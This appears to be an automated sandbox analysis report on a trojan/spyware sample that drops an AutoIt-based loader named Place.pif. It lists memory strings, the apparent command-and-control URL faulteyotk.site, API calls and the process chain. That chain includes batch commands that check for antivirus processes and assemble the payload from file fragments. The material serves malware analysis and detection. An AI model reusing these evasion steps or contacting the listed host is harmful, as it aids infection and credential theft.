Source: Place.pif, 0000000B.00000003.2613589389.0000000004427000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Place.pif, 0000000B.00000003.2613589389.0000000004427000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: Place.pif, 0000000B.00000003.2613589389.0000000004427000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: Place.pif, 0000000B.00000003.2642043750.00000000013B4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: Place.pif, 0000000B.00000003.2642043750.00000000013B4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
Source: Place.pif, 0000000B.00000003.2613589389.0000000004427000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Place.pif, 0000000B.00000003.2613589389.0000000004427000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: Place.pif, 0000000B.00000003.2613589389.0000000004427000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: Place.pif, 0000000B.00000003.2642043750.00000000013B4000.00000004.00000020.00020000.00000000.sdmp, Place.pif, 0000000B.00000002.2709228638.00000000013B7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://faulteyotk.site/
Source: Place.pif, 0000000B.00000003.2640382833.00000000013B4000.00000004.00000020.00020000.00000000.sdmp, Place.pif, 0000000B.00000003.2642043750.00000000013B4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://faulteyotk.site/.
Source: Place.pif, 0000000B.00000003.2640382833.00000000013B4000.00000004.00000020.00020000.00000000.sdmp, Place.pif, 0000000B.00000003.2642043750.00000000013B4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://faulteyotk.site/3
Source: Place.pif, 0000000B.00000002.2709113133.00000000012C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://faulteyotk.site/4
Source: Place.pif, 0000000B.00000003.2708172110.00000000012DE000.00000004.00000020.00020000.00000000.sdmp, Place.pif, 0000000B.00000002.2709113133.00000000012DE000.00000004.00000020.00020000.00000000.sdmp, Place.pif, 0000000B.00000002.2709439962.00000000042F0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://faulteyotk.site/api
Source: Place.pif, 0000000B.00000003.2708119609.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, Place.pif, 0000000B.00000002.2709228638.00000000013B7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://faulteyotk.site/apit
Source: Place.pif, 0000000B.00000003.2708172110.00000000012DE000.00000004.00000020.00020000.00000000.sdmp, Place.pif, 0000000B.00000002.2709113133.00000000012DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://faulteyotk.site/apiz
Source: Place.pif, 0000000B.00000003.2708119609.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, Place.pif, 0000000B.00000002.2709228638.00000000013B7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://faulteyotk.site/pi
Source: Place.pif, 0000000B.00000003.2640382833.00000000013B4000.00000004.00000020.00020000.00000000.sdmp, Place.pif, 0000000B.00000003.2642043750.00000000013B4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://faulteyotk.site/y?
Source: Place.pif, 0000000B.00000002.2708950114.000000000111D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://faulteyotk.site:443/apil
Source: Place.pif, 0000000B.00000003.2642043750.00000000013B4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: Place.pif, 0000000B.00000003.2641397218.00000000054BA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: Place.pif, 0000000B.00000003.2641397218.00000000054BA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: Place.pif, 0000000B.00000003.2642043750.00000000013B4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
Source: Okfjk1hs4kdhs2.exe, 00000000.00000003.2078289262.00000000028A8000.00000004.00000020.00020000.00000000.sdmp, Place.pif, 0000000B.00000003.2585910317.00000000046BA000.00000004.00000800.00020000.00000000.sdmp, Place.pif.2.dr, Hit.0.dr	String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: Place.pif, 0000000B.00000003.2642043750.00000000013B4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
Source: Okfjk1hs4kdhs2.exe	String found in binary or memory: https://www.digicert.com/CPS0
Source: Place.pif, 0000000B.00000003.2613589389.0000000004427000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: Hit.0.dr	String found in binary or memory: https://www.globalsign.com/repository/0
Source: Okfjk1hs4kdhs2.exe, 00000000.00000003.2078289262.00000000028A8000.00000004.00000020.00020000.00000000.sdmp, Place.pif, 0000000B.00000003.2585910317.00000000046BA000.00000004.00000800.00020000.00000000.sdmp, Place.pif.2.dr, Hit.0.dr	String found in binary or memory: https://www.globalsign.com/repository/06
Source: Place.pif, 0000000B.00000003.2613589389.0000000004427000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: Place.pif, 0000000B.00000003.2641397218.00000000054BA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: Place.pif, 0000000B.00000003.2641397218.00000000054BA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: Place.pif, 0000000B.00000003.2641397218.00000000054BA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: Place.pif, 0000000B.00000003.2641397218.00000000054BA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: Place.pif, 0000000B.00000003.2641397218.00000000054BA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: Place.pif, 0000000B.00000003.2641397218.00000000054BA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

Source: unknown	Network traffic detected: HTTP traffic on port 49969 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49928 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49946 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49917 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49936 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49911 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49956 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49917
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49928
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49936
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49969
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49946
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49901
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49956
Source: unknown	Network traffic detected: HTTP traffic on port 49901 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49911

Source: unknown	HTTPS traffic detected: 104.21.9.13:443 -> 192.168.2.5:49901 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.9.13:443 -> 192.168.2.5:49911 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.9.13:443 -> 192.168.2.5:49917 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.9.13:443 -> 192.168.2.5:49928 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.9.13:443 -> 192.168.2.5:49936 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.9.13:443 -> 192.168.2.5:49946 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.9.13:443 -> 192.168.2.5:49956 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.9.13:443 -> 192.168.2.5:49969 version: TLS 1.2

Source: C:\Users\user\Desktop\Okfjk1hs4kdhs2.exe

Code function: 0_2_004050CD GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_004050CD

Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif

Code function: 11_2_005F4830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

11_2_005F4830

Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif

Code function: 11_2_005F4632 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

11_2_005F4632

Source: C:\Users\user\Desktop\Okfjk1hs4kdhs2.exe

Code function: 0_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

0_2_004044A5

Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif

Code function: 11_2_0060D164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

11_2_0060D164

Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif

Code function: 11_2_005E4254: CreateFileW,DeviceIoControl,CloseHandle,

11_2_005E4254

Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif

Code function: 11_2_005D8F2E _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

11_2_005D8F2E

Source: C:\Users\user\Desktop\Okfjk1hs4kdhs2.exe	Code function: 0_2_00403883 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,		0_2_00403883
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	Code function: 11_2_005E5778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,		11_2_005E5778

Source: C:\Users\user\Desktop\Okfjk1hs4kdhs2.exe	File created: C:\Windows\ExternalFrame	Jump to behavior
Source: C:\Users\user\Desktop\Okfjk1hs4kdhs2.exe	File created: C:\Windows\AddressCommunications	Jump to behavior
Source: C:\Users\user\Desktop\Okfjk1hs4kdhs2.exe	File created: C:\Windows\TypicallyExam	Jump to behavior
Source: C:\Users\user\Desktop\Okfjk1hs4kdhs2.exe	File created: C:\Windows\FinalsMailing	Jump to behavior
Source: C:\Users\user\Desktop\Okfjk1hs4kdhs2.exe	File created: C:\Windows\GravityZdnet	Jump to behavior
Source: C:\Users\user\Desktop\Okfjk1hs4kdhs2.exe	File created: C:\Windows\QuantitativeChuck	Jump to behavior

Source: C:\Users\user\Desktop\Okfjk1hs4kdhs2.exe	Code function: 0_2_0040497C	0_2_0040497C
Source: C:\Users\user\Desktop\Okfjk1hs4kdhs2.exe	Code function: 0_2_00406ED2	0_2_00406ED2
Source: C:\Users\user\Desktop\Okfjk1hs4kdhs2.exe	Code function: 0_2_004074BB	0_2_004074BB
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	Code function: 11_2_0058B020	11_2_0058B020
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	Code function: 11_2_005894E0	11_2_005894E0
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	Code function: 11_2_00589C80	11_2_00589C80
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	Code function: 11_2_005A23F5	11_2_005A23F5
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	Code function: 11_2_00608400	11_2_00608400
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	Code function: 11_2_005B6502	11_2_005B6502
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	Code function: 11_2_005B265E	11_2_005B265E
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	Code function: 11_2_0058E6F0	11_2_0058E6F0
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	Code function: 11_2_005A282A	11_2_005A282A
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	Code function: 11_2_005B89BF	11_2_005B89BF
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	Code function: 11_2_005B6A74	11_2_005B6A74
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	Code function: 11_2_00600A3A	11_2_00600A3A
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	Code function: 11_2_00590BE0	11_2_00590BE0
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	Code function: 11_2_005ACD51	11_2_005ACD51
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	Code function: 11_2_005DEDB2	11_2_005DEDB2
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	Code function: 11_2_005E8E44	11_2_005E8E44
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	Code function: 11_2_00600EB7	11_2_00600EB7
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	Code function: 11_2_005B6FE6	11_2_005B6FE6
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	Code function: 11_2_005A33B7	11_2_005A33B7
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	Code function: 11_2_0059D45D	11_2_0059D45D
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	Code function: 11_2_005AF409	11_2_005AF409
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	Code function: 11_2_00581663	11_2_00581663
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	Code function: 11_2_0059F628	11_2_0059F628
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	Code function: 11_2_005A16B4	11_2_005A16B4
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	Code function: 11_2_0058F6A0	11_2_0058F6A0
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	Code function: 11_2_005A78C3	11_2_005A78C3
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	Code function: 11_2_005A1BA8	11_2_005A1BA8
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	Code function: 11_2_005ADBA5	11_2_005ADBA5
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	Code function: 11_2_005B9CE5	11_2_005B9CE5
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	Code function: 11_2_0059DD28	11_2_0059DD28
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	Code function: 11_2_005ABFD6	11_2_005ABFD6
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	Code function: 11_2_005A1FC0	11_2_005A1FC0

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\756341\Place.pif D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD

Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	Code function: String function: 005A8B30 appears 42 times
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	Code function: String function: 00591A36 appears 34 times
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	Code function: String function: 005A0D17 appears 70 times
Source: C:\Users\user\Desktop\Okfjk1hs4kdhs2.exe	Code function: String function: 004062A3 appears 57 times

Source: Okfjk1hs4kdhs2.exe, 00000000.00000003.2078289262.00000000028A8000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: OriginalFilenameAutoIt3.exeB vs Okfjk1hs4kdhs2.exe

Source: Okfjk1hs4kdhs2.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@22/13@2/1

Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif

Code function: 11_2_005EA6AD GetLastError,FormatMessageW,

11_2_005EA6AD

Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	Code function: 11_2_005D8DE9 AdjustTokenPrivileges,CloseHandle,		11_2_005D8DE9
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	Code function: 11_2_005D9399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		11_2_005D9399

Source: C:\Users\user\Desktop\Okfjk1hs4kdhs2.exe

0_2_004044A5

Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif

Code function: 11_2_005E4148 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

11_2_005E4148

Source: C:\Users\user\Desktop\Okfjk1hs4kdhs2.exe

Code function: 0_2_004024FB CoCreateInstance,

0_2_004024FB

Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif

Code function: 11_2_005E443D __swprintf,__swprintf,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,

11_2_005E443D

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5688:120:WilError_03

Source: C:\Users\user\Desktop\Okfjk1hs4kdhs2.exe

File created: C:\Users\user\AppData\Local\Temp\nszAB93.tmp

Jump to behavior

Source: C:\Users\user\Desktop\Okfjk1hs4kdhs2.exe

Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Belly Belly.bat & Belly.bat

Source: Okfjk1hs4kdhs2.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process

Source: C:\Users\user\Desktop\Okfjk1hs4kdhs2.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Okfjk1hs4kdhs2.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Place.pif, 0000000B.00000003.2626987968.0000000004404000.00000004.00000800.00020000.00000000.sdmp, Place.pif, 0000000B.00000003.2613285666.00000000043F6000.00000004.00000800.00020000.00000000.sdmp, Place.pif, 0000000B.00000003.2613367605.0000000004415000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: C:\Users\user\Desktop\Okfjk1hs4kdhs2.exe

File read: C:\Users\user\Desktop\Okfjk1hs4kdhs2.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Okfjk1hs4kdhs2.exe "C:\Users\user\Desktop\Okfjk1hs4kdhs2.exe"
Source: C:\Users\user\Desktop\Okfjk1hs4kdhs2.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Belly Belly.bat & Belly.bat
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 756341
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "MENTIONSTATICARGUEKEEPS" Abuse
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Significant + ..\Bow + ..\Olympics + ..\Intimate + ..\Tobago + ..\Suzuki + ..\Relevance V
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\756341\Place.pif Place.pif V
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\Desktop\Okfjk1hs4kdhs2.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Belly Belly.bat & Belly.bat	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 756341	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "MENTIONSTATICARGUEKEEPS" Abuse	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Significant + ..\Bow + ..\Olympics + ..\Intimate + ..\Tobago + ..\Suzuki + ..\Relevance V	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\756341\Place.pif Place.pif V	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5	Jump to behavior

Source: C:\Users\user\Desktop\Okfjk1hs4kdhs2.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Okfjk1hs4kdhs2.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Okfjk1hs4kdhs2.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Okfjk1hs4kdhs2.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Okfjk1hs4kdhs2.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\Okfjk1hs4kdhs2.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Okfjk1hs4kdhs2.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Okfjk1hs4kdhs2.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\Okfjk1hs4kdhs2.exe	Section loaded: iconcodecservice.dll	Jump to behavior
Source: C:\Users\user\Desktop\Okfjk1hs4kdhs2.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Okfjk1hs4kdhs2.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\Okfjk1hs4kdhs2.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\Okfjk1hs4kdhs2.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\Okfjk1hs4kdhs2.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\Okfjk1hs4kdhs2.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\Okfjk1hs4kdhs2.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\Okfjk1hs4kdhs2.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\Okfjk1hs4kdhs2.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\Okfjk1hs4kdhs2.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Okfjk1hs4kdhs2.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Okfjk1hs4kdhs2.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Okfjk1hs4kdhs2.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\Okfjk1hs4kdhs2.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Okfjk1hs4kdhs2.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Okfjk1hs4kdhs2.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\Okfjk1hs4kdhs2.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Okfjk1hs4kdhs2.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Okfjk1hs4kdhs2.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Okfjk1hs4kdhs2.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\Okfjk1hs4kdhs2.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Okfjk1hs4kdhs2.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\Okfjk1hs4kdhs2.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Okfjk1hs4kdhs2.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Okfjk1hs4kdhs2.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Okfjk1hs4kdhs2.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Okfjk1hs4kdhs2.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\Okfjk1hs4kdhs2.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: ntmarta.dll	Jump to behavior
